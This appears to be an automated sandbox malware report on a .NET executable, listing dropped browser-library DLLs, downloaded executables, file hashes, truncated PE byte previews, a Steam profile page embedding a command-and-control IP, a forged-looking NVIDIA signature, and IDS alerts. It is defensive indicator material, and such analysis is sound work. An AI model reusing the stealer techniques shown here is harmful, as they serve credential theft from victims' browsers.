Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0............................................................R....^.G.Y..60...7~...r..f.b.xg]..s.j.{0..M....6.....{..[..@U....Nq!...+.. ....J.......2....5....QL".l....V......M@........_....)K...P.../p.wg..........7:?.C..f ....Sc...... x.n];.w1..e.$:z.d.>!.t..q....Vg.3c.h.hlWt..5...br...H.XD6...uW11v9I.\|...xJnLx......w>..>s...^.'.s2J....Y......U......-.E#).:....~...2]8...SU..f8zd.i..ns>..fx...:.U..&B....`.g...Z.L.#........03z..>..^...t.K.Y.[q

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CBFBKFIDHI.exe.log

Download File

Process:	C:\ProgramData\CBFBKFIDHI.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KJEHJKJEBG.exe.log

Download File

Process:	C:\ProgramData\KJEHJKJEBG.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398882833117642
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sm:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFr
MD5:	9A1603DC88EEBDC01CC986C726D5CB07
SHA1:	017DD59631A4C8B7DD93DD7CEABB5D58F30E0A49
SHA-256:	AA9CE7ED770F7FF85EF1CEF91117909C57DBD2585A1F90172305366975A5C5E3
SHA-512:	C7C874D21CB1657938EB4544DFE6BD4C9D5A80A883D8C8254270D05A33F9DE51296789252E4F79A783B7D50E5140F51A03F36E6640319D9EB66C8C330F8A0FAA
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398356004945737
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sv:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFK
MD5:	D0411B3D5BCB160DEE12B6952178A0AA
SHA1:	E69DE0A7E35036B7E75BAF906A41825C1043EC8E
SHA-256:	B34B432D98A045499B57395A4DA76092E5A0AF8C7C01CEAFA9F500A7C19F54BD
SHA-512:	AA8022A7A13130884C2D5300AAE0D7553646D86B3BBA93AE01DD2EADEEE21D228C4312AF28ACB8F14CDE354BAB422D9637FB34A2CB0F1FF4CFE3AE1F912452C3
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ljhgfsd[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.988110023083548
Encrypted:	false
SSDEEP:	6144:CQuuGQX/FN5CVU03+wwybsDV3Sdmq2r5tmsz2ViLEO:vui9N5iQ5p3Sd0TmsTEO
MD5:	16F5B27C9E1376C17B03BF8C5090DB3C
SHA1:	676145AB7CA93E0463B931E6A056804B8F42119E
SHA-256:	7952E7769A991C349CC092B9CB3D1505405E793B526F49C784C343DD7D3CD227
SHA-512:	23FE6E23E80257469C09BA68B2C78EE6B3C03700E8173EFF4E2CA94964AD3AB8F2B0CB20DD01E483BF6B7D8DE1138BC946CEBBA6BEC10D78E7CCEC6DC0C3CB5E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................M.b.K..K.9~h.w....G).2..X..u.........&...W...`.r..I.z-@..W....y...x..e...g.O....f.&..~.vV.\...yM<..V&..z..B.).....y..-....g.*E..!T9.z...M..."...A...#..V..kj#.2....)........:r...-9\..hK<....f3u.xX....T.....+Q:.......T....X.i.v7.....Q.9vq. .M.r0..}k.t5J!..1.e..U..;....;..z.9_Y.T3?k%..L.6M....;.P.5W.'0....V.T,9wl..y....]....sj:y..k.4.$.".o.9.V+.@Re3Y..(...:.K.O#..L..X%.u..`&.1&..X{.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vdshfd[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.988867781346718
Encrypted:	false
SSDEEP:	6144:O+0dGgr04h1LBuTmcYz43wUDPNvms5PYYzX3oYbEU6DsV4+1/QSyiZEO:30d/h1LBK13wUjx5QYTo0EUBVSS/EO
MD5:	2CCE29D734EA1D227B338834698E2DE4
SHA1:	41700CD1BCF5F5BCCA81CE722ED47FC17BD030C2
SHA-256:	F75ACF936390F89239C43552717EFB65C4C3190B16A7EEC62DCD0053A045E91D
SHA-512:	EA0B440113A225764B38AE2526A10F7E4F3081E4A353E9831CF0E846AC7BA97EA7C2B4A12AB6FAC5708A7855DA8967F1B6BC661757DC68D819D11887A6AF20B5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0............................................................R....^.G.Y..60...7~...r..f.b.xg]..s.j.{0..M....6.....{..[..@U....Nq!...+.. ....J.......2....5....QL".l....V......M@........_....)K...P.../p.wg..........7:?.C..f ....Sc...... x.n];.w1..e.$:z.d.>!.t..q....Vg.3c.h.hlWt..5...br...H.XD6...uW11v9I.\|...xJnLx......w>..>s...^.'.s2J....Y......U......-.E#).:....~...2]8...SU..f8zd.i..ns>..fx...:.U..&B....`.g...Z.L.#........03z..>..^...t.K.Y.[q

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:33h:B
MD5:	489EB794520DC9E7229839D8CEC047F0
SHA1:	7767538DB6E200DE5A82B1CA224048DA424FF05A
SHA-256:	3B86C3C01ED2065F18A88E0CB3872CB0A993E8F6D2A5AC6283BE02D267C08635
SHA-512:	C715C55E4B979ADE5E2A1E6CC73FC9DFE5EEF5808FBF03DD3928F21ED210E1AC9E143303AECFF8A90392D61C75DE258A09D43113667D7E45554815B3C0A72C80
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\ProgramData\KJEHJKJEBG.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	2.2845972159140855
Encrypted:	false
SSDEEP:	3:i6vvRyMivvRya:iKvHivD
MD5:	45B4C82B8041BF0F9CCED0D6A18D151A
SHA1:	B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
SHA-256:	7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
SHA-512:	B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
Malicious:	false
Preview:	0..1..2..3..4..0..1..2..3..4.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989285823293327
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	1992187cfdd036a0eecb8f5ca9340cc0
SHA1:	0aac664d9c06f47a970f88389401a14705337121
SHA256:	3a82cb00938ffbdf09c91c39120f57054df7573950701ce8be86aec0342bc1b5
SHA512:	37651fc773621566790569ec76af4a7e66f50472a7be6ba11575592514e0d11f4ff8cc1c83c5d3ebcde3c15ef942becbb8e71f763398fd5ffaa74c78a0379b92
SSDEEP:	12288:9TF2nYPwGYGzePmnWkMkBR0pwvxT613EO:9TF2YPwGleYMkBRVZ6Rt
TLSH:	2E94232E2E808715CC280F7E7865C5B6BBBD657372DE7506615BDB04A738BF41CA4382
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x463c3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F59212 [Thu Sep 26 16:55:46 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 00:00:00 16/01/2026 23:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63be8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63ab0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61c44	0x61e00	ac28c03bb6afad9969d9edd261dd59ac	False	0.9937839240102171	data	7.995740381906031	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5c8	0x600	db1daa9db276719b7dce2f7fee59adb7	False	0.4361979166666667	data	4.115782972549961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	668ddc03321cdfb17f8be719cbc539e8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x643d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T22:56:23.567077+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49740	5.75.211.162	443	TCP
2024-09-26T22:56:24.747271+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49741	5.75.211.162	443	TCP
